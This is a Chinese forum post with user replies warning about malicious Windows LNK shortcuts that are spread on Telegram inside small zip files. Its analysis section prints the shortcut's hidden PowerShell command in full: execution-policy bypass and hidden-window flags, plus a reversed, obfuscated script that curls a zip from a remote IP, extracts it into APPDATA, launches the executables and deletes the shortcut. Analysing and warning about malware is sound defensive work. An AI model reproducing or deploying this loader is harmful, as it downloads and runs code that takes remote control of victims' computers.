近期telegram有人大肆传播lnk病毒

Author: zs448 - Posted:27天前 - View:356

文件特征如下描述

一个zip压缩包,名字任意。但是压缩包非常小,小于10KB。

点开后里面是lnk文件,该文件为Windows平台专用,本质上是可执行任意指令的快捷方式。点击后你的电脑会变成肉鸡,入侵者可随意远程控制你的电脑。

所以遇到体积过小的压缩包,你又在使用Windows平台的话,请务必不要打开!推荐去把Windows的隐藏已知后缀取消,不要点击陌生lnk文件。

同时,推荐前往Windows telegram客户端关闭自动下载。

通过中标的人把lnk文件分享出来,写的啥?有懂的没?

1、目标执行程序

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

2、原始参数(只截取前200字符,太多了)

-NoP -ep Bypass -w h -EncodedCommand  JAByAGUAdgAgAD0AIAAnADsAIgBlAHgAZQAuAGQAcwBsAG8AbwB0AG0AdgBcAFwAQwBNAE0AXABcAHQAZgBvAHMAbwByAGMAaQBNAFwAXABBAFQAQQBEAFAAUABBADoAdgBuAGUAJAAiACAAJgA7ACIAZQB…

3、以下是解码后的PowerShell命令

$rev = ';"exe.dslootmv\\CMM\\tfosorciM\\ATADPPA:vne$" &;"exe.tropghc\\CMM\\tfosorciM\\ATADPPA:vne$" &;ecroF- "piz.1IJIZ\\CMM\\tfosorciM\\ATADPPA:vne$" metI-evomeR ;ecroF- "CMM\\tfosorciM\\ATADPPA:vne$" htaPnoitanitseD- "piz.1IJIZ\\CMM\\tfosorciM\\ATADPPA:vne$" htaP- evihcrA-dnapxE;gnisraPcisaBesU- "piz.1IJIZ\\CMM\\tfosorciM\\ATADPPA:vne$" o- "piz.1IJIZ/541.821.221.}BS{$}vv{$}ca{$" lruc;}lluN-tuO|ecroF- "CMM\\tfosorciM\\ATADPPA:vne$" yrotceriD epyT- metI-weN  {))"CMM\\tfosorciM\\ATADPPA:vne$" htaP-tseT( ton-( fi ;gnisraPcisaBesU- "txt.明说\\htaPlacol$" o- "txt.明说/541.821.221.}BS{$}vv{$}ca{$" lruc;"431//:"=BS$;"gnisra"=ll$;"Pci"=kk$;"saB"=jj$;"esU-"=hh$;"p"=vv$;"tth"=ca$;"jdh"=jdh$;"juh"=juh$;"jDSh"=ERh$;"ertry"=dsef$;"eeewssy"=ssef$;"eesarreefdssy"=ssgfdf$;"eesacvd"=ssghild$;"teydhs"=DHSTRY$;"tolyghbs"=erfgy$;"dpolls"=fedsaa$;"dujtd"=ADSdRFD$;"sarfvc"=uuuhfb$;"sartrrtkj"=utvvyyyyhnd$;"sarKJHj"=utvvyyyHBnA$;"sarKFHj"=utADHBnA$;"sar"=utA$;"sarK"=utAd$;ecroF- "knl.txt.明说\\htaPlacol$" htaP- metI-evomeR ;htaP.)noitacoL-teG( = htaPlacol$'
$cmm = -join $rev[-1..-$rev.Length]
Invoke-Expression $cmm

4、图标伪装成下列形式

.\1.txt

5、文件描述(可能是垃圾数据)

JMjbdLxqqm1lDDqudandas

6、文件的一些时间信息

  • 创建时间 : 2023-06-26 10:13:29.233510+00:00
  • 修改时间 : 2023-06-26 10:13:29.233510+00:00
  • 访问时间 : 2023-06-26 10:13:29.233510+00:00

7、原始文件大小显示为323584字节

8、分布式链接追踪信息(机器标识等)

  • 机器标识符 : TESTMACHINE01234
  • Droid卷标识: 0C703587-9D5D-40F3-8021-0578FC96DDFD
  • Droid文件标识: D811239A-DCEC-4EF7-B3C9-55B9814E0699
0 人点赞  ∙  0 人收藏  
加入收藏 点赞 我要评论

目前共有 18 条回复

aerph
- aerph - 27天前

用win版纸飞机的应该容易中招,像我基本不接触这软件,不会碰到这种情况,不止这样,不熟悉的东西不要轻易去点它,问题应该不大的,就算中招了也不怕,只有系统有备份,随时恢复就行

dosmoking
- dosmoking - 27天前

看不懂,也不想看懂,单个词看都认识,堆在一起完全不知道,不用TG

zls511234
- zls511234 - 27天前

楼主大大,62.giftelegram是啥?可以传给我看看吗?

zls511238
- zls511238 - 27天前

之前在群里有看过,有很长一段时间了吧,最近又开始传播了?39.gif,只有电脑上安装杀毒软件,会自动拦截的,个人不要太自信,必要时杀毒软件可以救救的

zls511255
- zls511255 - 27天前

前不久我的tg帐号被盗了,虽然不是这种病毒,是那种以exe结尾的,我好像是要找啥需要的软件来着,然后就双击exe的应用程序,然后就没有然后了,对这些制造病毒的真是咬牙切齿的深恶痛觉30.gif30.gif30.gif

e05ee
- e05ee - 27天前

这种病毒真是防不胜防, 毕竟lnk是Windows的快捷方式, 不小心双击打开肯定完蛋, 如果是快捷方式仿熟悉的图标, 那就更多人中标了, 如果不熟悉的图标还好点.

hbZKq
- hbZKq - 27天前

我在想如果系统开了UAC的话, 估计攻击成功机会就要小很多了, 除非攻击代码里就有提权功能, 或者就是精通底层的奇才....

sgkanz
- sgkanz - 27天前

我记得不久前有种攻击方式是Powershell粘贴回车获取验证码, 反正win平台最好安装些杀软是必要的, 可以帮你解决生活中常见的麻烦事了, 至于更难解决的得靠人自己地13.gif

lessis
- lessis - 27天前

好像很少听到linux或macx中招的新鲜事, 是高额价格和系统筛选人了, 我等这种穷B连被筛选的机会都没

zls511220
- zls511220 - 27天前

反正我老电脑都没用了, 我愿意牺牲一下, 有人还有病毒文件吗???分享一下我试试, 看对方是不是要把我电脑弄炸掉27.gif

sange
- sange - 27天前

"该漏洞最早于2025年3月被发现,8月被公开披露,微软最初拒绝承认其风险,后在第三方安全公司提供微补丁后进行了修复"-摘自百科.狗软还不承认, 承认了然后修复不就是好了, 西方就跟小日本一样没有羞耻心, 只是不被发现, 一切都跟没事一样...我CNM

lydia
- lydia - 27天前

看来各位消息闭塞了,,,,都已经2025年的事了, 现在还在被讨论, 应该是大家忙于工作, 只要更新系统最新系统就行了, 具体补丁都没有提供, 我还想着找到补丁分享来着

geekobo
- geekobo - 27天前

@zls511234 不懂的话, 用元宝,deepseek,豆包等工具都可以得到你想要的答案, 一款聊天工具, 不过国内无法用

weiboking
- weiboking - 26天前

我没遇到过此病毒, 倒是U盘里的一直给你新建快捷方式的病毒中标过, 在网上有看到过讨论叫什么蠕虫,vbs病毒, 时间久了, 反正U盘格式化后就没了, 我那U盘就是装系统的, 没有其他文件, 要不然真是得不偿失啊

aerph
- aerph - 26天前

计算机里的病毒就跟现实病毒一样,有各种各样的变种,虽然修复了,要不了多久又有新的变种出来祸害了,只有修复不完的bug,如果都修复完了,软件或系统公司的人员都改裁掉了

ericao
- ericao - 25天前

看来各位道友喜欢折腾,难怪容易招针,我没事从不开电脑,想让我中针都难啊48.gif

eai7u
- eai7u - 21天前

我中标了,不过不是这款,而且网上下载站下载软件,用了高速下载功能,点exe软件后,给我电脑安装十几款软件,卸载这些破软件时,我电脑给搞蓝屏无法开机了,只得重装系统,去TMD的。

wb66f694a
- wb66f694a - 19天前

用手机浏览器逛网站时,突然手机不受控制,自动打开摄像头直接对着我的脸,吓得我赶紧关机,第二天才敢开机,幸好那个手机只是备用机,我直接刷机了,如果是主力机,那我将损失惨重,至今我也不清楚到底是点了网站上什么地方导致出现这种情况的。